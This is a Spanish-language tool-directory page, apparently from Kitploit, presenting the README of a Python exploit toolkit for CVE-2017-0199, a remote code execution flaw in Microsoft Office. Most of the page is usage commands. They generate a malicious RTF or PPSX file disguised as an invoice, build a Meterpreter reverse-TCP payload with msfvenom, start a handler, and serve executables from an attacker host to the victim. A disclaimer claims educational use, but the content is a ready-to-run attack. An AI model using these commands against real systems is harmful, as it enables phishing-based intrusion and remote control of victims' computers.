Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-0199 — Exploit toolkit CVE-2017-0199 - v4.0 es un práctico script de Python que proporciona a pentesters e investigadores de seguridad una forma rápida y eficaz de probar la ejecución remota de código (RCE) en Microsoft Office. Puede generar un archivo RTF/PPSX malicioso y entregar metasploit / meterpreter / otros payloads a la víctima sin ninguna configuración compleja. | Kitploit
Herramientas/GitHubGitHub/bhdresh/cve-2017-0199
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebAnálisis de MalwarePruebas de PenetraciónAprendizaje y Educación
GitHubbhdresh/cve-2017-0199

CVE-2017-0199

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
72425614hace 8 añosRevisado por Kitploit

Acerca de

Exploit toolkit CVE-2017-0199 - v4.0 es un práctico script de Python que proporciona a pentesters e investigadores de seguridad una forma rápida y eficaz de probar la ejecución remota de código (RCE) en Microsoft Office. Puede generar un archivo RTF/PPSX malicioso y entregar metasploit / meterpreter / otros payloads a la víctima sin ninguna configuración compleja.

Compartir

Kit de explotación CVE-2017-0199 - v4.0

El kit de explotación CVE-2017-0199 - v4.0 es un práctico script de Python que proporciona a pentesters e investigadores de seguridad una forma rápida y efectiva de probar RCE en Microsoft Office. Puede generar un archivo RTF/PPSX malicioso y entregar metasploit / meterpreter / otros payloads a la víctima sin necesidad de configuración compleja.

Descargo de responsabilidad

Este programa es SOLO para fines educativos. No lo utilices sin permiso. Aplica el descargo de responsabilidad habitual, especialmente el hecho de que yo (bhdresh) no soy responsable de los daños causados por el uso directo o indirecto de la información o funcionalidad proporcionada por estos programas. El autor o cualquier proveedor de Internet NO asume responsabilidad alguna por el contenido o el mal uso de estos programas ni de cualquier derivado de los mismos. Al usar este programa aceptas que cualquier daño (pérdida de datos, caída del sistema, compromiso del sistema, etc.) causado por el uso de estos programas no es responsabilidad de bhdresh.

Por último, esto es un desarrollo personal; respeta su filosofía y no lo uses para fines malintencionados.

Licencia

Licencia CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

Nota de la versión:

Se introdujeron las siguientes capacidades en el script

root@kitploit:~
- Generate Malicious PPSX file
- Exploitation mode for generated PPSX file
- Updated template.ppsx

Versión: Python 2.7.13

Escenario 1: Entregar payload local

Comandos de ejemplo
root@kitploit:~
1) Generate malicious RTF file
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Start toolkit in exploit mode to deliver local payload
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
Diagrama de secuencia

alt tag

Escenario 2: Entregar payload remoto

Comandos de ejemplo
root@kitploit:~
1) Generate malicious RTF file
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Start toolkit in exploit mode to deliver remote payload
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe
Diagrama de secuencia

alt tag

Escenario 3: Entregar archivo HTA personalizado

Comandos de ejemplo
root@kitploit:~
1) Generate malicious RTF file
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Start toolkit in exploit mode to deliver custom HTA file
   # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta
Diagrama de secuencia

alt tag

Argumentos de la línea de comandos:

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

This is a handy toolkit to exploit CVE-2017-0199 (Microsoft office RCE)

Modes:

-M gen                                          Generate Malicious file only

     Generate malicious RTF/PPSX file:

      -w <Filename.rtf/Filename.ppsx>     Name of malicious RTF/PPSX file (Share this file with victim).

      -u <http://attacker.com/test.hta>   The path to an HTA/SCT file. Normally, this should be a domain or IP where        this                                          tool is running.
                                      For example, http://attackerip.com/test.doc (This URL will be included in 	                                              malicious RTF/PPSX file and will be requested once victim will open malicious RTF file.
      -t RTF|PPSX (default = RTF)         Type of the file to be generated.
      -x 0|1  (default = 0)               Generate obfuscated RTF file. 0 = Disable, 1 = Enable.

				      
-M exp                                          Start exploitation mode

     Exploitation:
 
      -t RTF|PPSX (default = RTF)         Type of file to be exolited.
      -H </tmp/custom>                Local path of a custom HTA/SCT file which needs to be delivered and executed on target.
                                          NOTE: This option will not deliver payloads specified through options "-e" and "-l"
					  
      -p <TCP port:Default 80>            Local port number.

      -e <http://attacker.com/shell.exe>  The path of an executable file / meterpreter shell / payload  which needs to be executed on target.

      -l </tmp/shell.exe>                 If payload is hosted locally, specify local path of an executable file / meterpreter shell / payload.

Créditos

@nixawk por la muestra RTF, @Li Haifei, @bhdresh

Errores, incidencias y solicitudes de funciones

Obviamente, no soy un desarrollador a tiempo completo, así que espera algunos contratiempos

Por favor, reporta errores e incidencias a través de https://github.com/bhdresh/CVE-2017-0199/issues/new

Descargar herramienta